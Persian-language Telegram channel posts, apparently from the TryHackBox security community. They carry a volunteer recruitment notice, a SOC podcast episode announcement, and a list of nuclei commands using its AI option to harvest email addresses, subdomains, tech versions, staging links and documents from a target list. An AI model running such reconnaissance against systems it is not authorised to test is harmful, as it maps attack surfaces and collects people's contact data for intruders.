معرفی در بخش همکاران پروژه (پس از انتشار)
دریافت گواهی همکاری پس از مشارکت مؤثر
ساخت رزومه و نمونهکار (Portfolio) واقعی
شبکه سازی و همکاری با متخصصان امنیت سایبری
تخفیف ویژه برای دورههای آموزشی و کتابهای تخصصی
امکان دریافت دورهها یا کتابهای منتخب بهصورت رایگان (بر اساس میزان مشارکت)
اولویت همکاری در پروژه های آینده و فرصت های تجاری احتمالی
مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت
📌 این همکاری در حال حاضر کاملاً داوطلبانه است. هدف ما ساخت یک پلتفرم آموزشی باکیفیت برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکلگیری آینده پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، در اولویت همکاری های بعدی قرار میگیرند.
📩 در صورت علاقه به همکاری، از طریق پیام خصوصی با ما در ارتباط باشید:
@ThbxSupport
❤2
Forwarded from رادیو زیرو پاد
اپیزود دوم از ZeroLand - رادیو زیرو پاد
Zahra Khademi | @RadioZeroPd - TryHackBox
📌 فصل اول :: اپیزود دوم از سری مباحث SOC پادکست
🎙 راوی : خانم زهرا خادمی
🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @AiTHB
⭕ اپیزود ۲ : پیشنیازهایی که باید بلد باشید (چرا بدون درک شبکه نمی توان کارشناس soc شد؟ آشنایی اولیه با سیستمعامل ها (تفاوت تحلیل لاگ های ویندوز و لینوکس).
معرفی ابزار Wireshark (دیدن پکتها زیر ذرهبین)
🎙 راوی : خانم زهرا خادمی
🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @AiTHB
🔥 برای جمع آوری اطلاعات سریع تر
@TryHackBox
nuclei -list targets.txt -ai "Extract page title, detech tech and versions"
nuclei -list targets.txt -ai "Extract email addresses from web pages"
nuclei -list targets.txt -ai "Extract all subdomains referenced in web pages"
nuclei -list targets.txt -ai "Extract all external resource URLs (CDNs, images, iframes, fonts) from HTML"
nuclei -list targets.txt -ai "Extract social media profile links from web pages"
nuclei -list targets.txt -ai "Extract links pointing to staging, dev, or beta environments from HTML"
nuclei -list targets.txt -ai "Extract all links pointing to PDF, DOCX, XLSX, and other downloadable documents"کدوم دستور Nuclei AI رو تست کردین که staging لینک یا ایمیل حساس رو شکار کرد؟ تجربتون رو کامنت کنین
@TryHackBox
❤6